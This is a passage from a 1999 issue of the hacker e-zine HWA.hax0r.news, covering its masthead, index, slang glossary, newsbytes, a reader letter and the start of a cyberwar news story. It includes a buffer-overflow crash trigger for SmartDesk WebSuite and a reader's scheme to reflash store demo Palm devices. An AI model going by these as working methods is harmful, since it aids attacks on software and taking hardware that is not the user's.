[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 20 Volume 1 1999 May 29th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "There are two major products that come out of Berkeley: LSD and UNIX. We don't believe this to be a coincidence." -Jeremy S. Anderson HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. 
It *is* intended however, to complement such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, it's a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #20
=-----------------------------------------------------------------------=

"It is possible to provide security against other ills, but as far as death is concerned, we men live in a city without walls." -Epicurus

We could use some more people joining the channel, it's usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
Issue #20
=--------------------------------------------------------------------------=

"Wars have never hurt anybody except the people who die." -Salvador Dali

[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. 
COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Clinton Authorizes Cyber Attack??? .............................. 03.1 .. More on the 'Cyberwar'........................................... 04.0 .. RootFest Scares Officials In Minneapolis ........................ 05.0 .. Australia Admits to Echelon ..................................... 06.0 .. Banks to Test Home User PC Security ............................. 07.0 .. EMPEROR VIRUS.................................................... 08.0 .. WINHLP32.EXE BUFFER OVERRUN...................................... 09.0 .. NAI ON GALADRIEL VIRUS........................................... 10.0 .. Know your enemy parts 1,2 and 3.................................. 11.0 .. Cox Report Blasts DOE Computer Security ......................... 12.0 .. Black Hat Briefings Announced ................................... 13.0 .. eEYe Digital Security advisory: Multiple Web Interface Security Holes 14.0 .. Fun with ICQ..................................................... 15.0 .. FBI raids suspected hackers...................................... 15.1 .. Real life hacker wargames........................................ 16.0 .. MOD hacks Senate site............................................ 17.0 .. Backdoor-G a new 'backorifice like' trojan and BO2K.............. 
18.0 .. [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine..... 19.0 .. [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer....... 20.0 .. Five Busted in Florida .......................................... 21.0 .. Danes Finger Swede for Cracking 12,000 Systems .................. 22.0 .. EFA Plans Net Censorship Demonstrations.......................... 23.0 .. Design Principals for Tamper-Resistant Smart Card Processors..... 24.0 .. Melissa finds a mate............................................. 25.0 .. punkz.com sets up a page for feedback on the presidential cyberwar 26.0 .. Its that time of month again, when the 26th rolls around, look out 27.0 .. Submission: "Be A Nice Hacker" by System......................... 28.0 .. Hacking Memes by Stephen Downes.................................. 29.0 .. [ISN] House panel aims to bolster security law................... 30.0 .. [ISN] NSA Taps Universities For Info Security Studies............ 31.0 .. [ISN] HushMail: free Web-based email with bulletproof encryption. 32.0 .. [ISN] E-Biz Bucks Lost Under SSL Strain.......................... 33.0 .. [ISN] Bracing for guerrilla warfare in cyberspace................ 34.0 .. [ISN] Prosecuting Lee Is Problematic............................. 35.0 .. [ISN] Slip of the Tongue Lightens up Encryption Hearing ......... 36.0 .. [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control", 37.0 .. [ISN] LCI Intros SMARTpen Biometric Signature Authentication..... 38.0 .. [ISN] CFP: DISC 99 Computer Security 99.......................... 39.0 .. [ISN] GAO: NASA systems full of holes............................ 39.1 .. [ISN] Nasa vulnerabilities potentially deadly.................... 40.0 .. Citrux Winframe client for Linux vulnerability................... 41.0 .. [ISN] Top 10 candidates for a "duh" list (general sec/crypto).... 42.0 .. Seeing invisible fields and avoiding them...the MicroAlarm....... 43.0 .. 
RelayCheck v1.0 scan for smtp servers that will relay mail....... 44.0 .. Admintool exploit for Solaris (Updated) by Shadow Penguin Security 45.0 .. AppManager 2.0 for NT from NetIQ displays passwords in cleartext 46.0 .. Cgichck99 ported to Rebol from Su1d Sh3ll's .c code.............. 47.0 .. ICSA certifies weak crypto as secure............................. 48.0 .. RAS and RRAS vulnerability....................................... 49.0 .. Whitepaper:The Unforseen Consequences of Login Scripts By Dan Kaminsky 50.0 .. Vulnerability in pop2.imap....................................... 51.0 .. Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability' 52.0 .. Advisory: NT ODBC Remote Compromise............................... 53.0 .. Advisory: Buffer overflow in SmartDesk WebSuite v2.1.............. 54.0 .. Security Leak with IBM Netfinity Remote Control Software.......... 55.0 .. IBM eNetwork Firewall for AIX .................................... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. 
Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. 
If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. 
If you still can't think of anything you're probably not that interesting a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See 
appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care whether the article/email is to be used in an issue or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body "subscribe bugtraq". I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. 
This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  
Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. 
currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 What's in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind, if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. 
It's almost like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written as =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??

*CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . 
An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. 
;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. 
* all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to t4ck for making my night albeit I couldn't stick around for the rest of the comedy routine. hacked star dot star with phf huh? .... ;-)) and the #innerpulse, crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ THE FIRST TRUE CYPHERPUNK NOVEL (CULT. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/culture/story/19720.html Two generations of swashbuckling geeks tackle the forces of evil. Call it hip, call it funny. But you can't call it light summer reading. Declan McCullagh reviews Neal Stephenson's Cryptonomicon. (checkout www.cryptonomicon.com also - Ed) ++ STUDENTS ARRESTED From HNS http://www.net-security.org/ by BHZ, Friday 28th May 1999 on 12.02 am CET Five Flagler Palm Coast High School students - one the son of a Bunnell city commissioner - are facing a litany of criminal charges after authorities said they used a computer trojan to hack into the school's network and commandeer teacher and student files. Flagler County sheriff's deputies arrested the students Monday. 
All five were taken to the Division of Youth Services in Daytona Beach before being released to their parents.

++ FIGHT THE CENSORSHIP
From HNS http://www.net-security.org/
by BHZ, Thursday 27th May 1999 on 9.53 pm CET

Yesterday, the Australian Senate passed legislation to censor the Internet. In order to protest censorship people will join with like minded groups and individuals in a day of action against censorship. Download flyers here and sure do visit the Electronic Frontiers Australia site.

http://www.anatomy.usyd.edu.au/danny/freedom/march/
http://www.efa.org.au

++ SMARTDESK WEBSUITE BUFFER OVERFLOW
From HNS http://www.net-security.org/
by BHZ, Thursday 27th May 1999 on 9.47 pm CET

As posted on BugTraq by cmart: "WebSuite v2.1 will crash when an additional 250+ characters are appended after the site's URL on NT Server 4 and NT Workstation 4 boxes. Running on top of Windows 98 it will crash with 150+ characters appended after the site's URL. After reinstalling on both platforms several times, the overflow string length varied. Approximately 1 out of 8 times the overflow string went from 150 chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about 2000+ chars".

++ GETTING ZAPPED FOR BETTER Z'S (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19713.html

Relief is on the way for chronic snorers and their partners. A new therapy uses radio waves to treat the breathing disorder known as sleep apnea. By Kristen Philipkoski

Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hacking the Palm Pilot demos...
Date: Thu, 20 May 1999 23:56:05 -0400
From: scosha@home.com
Organization: @Home Network
X-Mailer: Mozilla 4.51 [en]C-AtHome0404 (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: hwa@press.usmc.net
Subject: subject for newsletter
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

As we all know 3Com has recently released the Palm IIIx and V. The Palm V
demo in store displays is a dummy unit with a hunk of lead inside. On the
other hand the Palm IIIx is a fully working unit. There is a trick to make
it work 100%. Like its predecessor the Palm III the demo, if you could get
your hands on one, was not hard to reflash the OS rom and presto you had a
Palm III worth $500.00 and there was little effort involved. The IIIx poses
a little more difficulty. They have employed a new strategy. 1st 3Com went
with the new Ezball Motorola Dragon processor, and put the Os in static
non volatile memory. While it's not hard to download a fresh copy of the
OS from a real store bought IIIx, the trick is in flashing the demo unit.
The programs used to flash the III do not work on the IIIx, all you will
get is a 'wrong header card version' message, which basically seals your
fate. I have been working on trying to flash the proper OS replacing the
demo OS (which won't allow you to input anything) to no avail. I put it
out to the people who do these things best. I know not what to do from
here. I have a few insiders helping but it is a much kept secret.

zzcrazyman

================================================================

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /*
     * Well things are moving along rather smoothly, its been a comparatively
     * slow (but interesting) week on the news front with some FBI action coming
     * down on people and shit, not a good time for hacker groups right now as
     * it looks like the crackdown is only going to get worse in the future.
     *
     * Anyway, drop into #hwa.hax0r.news the key is usually off and we're a
     * friendly bunch, stop by and chat about some of the stories here or that
     * you've seen elsewhere, other than that take it easy til next time...
     *
     * Here's #20, have at it...
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main
address: hwa@press.usmc.net complaints and all nastygrams and mailbombs
can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private
mail to cruciphux@dok.org

danke.

C*:.

@HWA

03.0 Clinton Authorizes Cyber Attack???
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Sangfroid

Reuters and Wired Online articles are referencing a print story in
Newsweek that claims that President Clinton has authorized a "top-secret"
plan against Slobodan Milosevic. One part of this plan would use "computer
hackers" to attack his foreign bank accounts. Reuters also claimed that
Newsweek said that the report instructed the CIA to wage "cyberwar"
against Milosevic. Now there are still a few questions that are not
answered in this news article. If the report was so top-secret how did
Newsweek learn of it? Won't other countries be rather upset when we "hack"
into their banks? And aren't his bank accounts frozen anyway, so what is
the point of breaking in? Newsweek even admits that it does not have
access to the original report. Once again until we see confirmation HNN
will treat this story as extremely suspect.

Newsweek
http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm
Reuters - Via Yahoo
http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19990523/ts/yugoslavia_usa_cyberwar_2.html
Wired
http://www.wired.com/news/news/politics/story/19836.html

Newsweek EXCLUSIVE
Cyberwar and Sabotage
President Clinton has OK'd a top-secret plan to destabilize Milosevic—and
go after his money
By Gregory L. Vistica

Covert action is seductive to policymakers in a bind.
When diplomacy fails and force falls short, presidents often turn to the CIA for secret solutions to vexing problems. Unable to make the air war against Serbian leader Slobodan Milosevic effective, and unwilling to invade with ground troops, President Clinton has decided to try a clandestine third way. Earlier this month national-security adviser Sandy Berger presented Clinton with a covert plan to squeeze Milosevic. The president liked the idea. Senior intelligence officials tell NEWSWEEK that last week Clinton issued a "finding," a highly classified document authorizing the spy agency to begin secret efforts "to find other ways to get at Milosevic," in the words of one official. Two weeks ago Berger secretly briefed members of the House and Senate Intelligence committees about the details of the two-part plan. According to sources who have read the finding, the CIA will train Kosovar rebels in sabotage—age-old tricks like cutting telephone lines, blowing up buildings, fouling gasoline reserves and pilfering food supplies—in an effort to undermine public support for the Serbian leader and damage Yugoslav targets that can't be reached from the air. That much is unsurprising. But the CIA has also been instructed to conduct a cyberwar against Milosevic, using government hackers to tap into foreign banks and, in the words of one U.S. official, "diddle with Milosevic's bank accounts." The finding was immediately criticized by some lawmakers who questioned the wisdom—and legality—of launching a risky covert action that, if discovered, could prolong the war, alienate other NATO countries—and possibly blow back on the United States. Under the finding, the allies were to be kept in the dark about the plan. Other members of Congress privy to the finding wondered about its timing. Why did Clinton authorize the operation just as diplomats 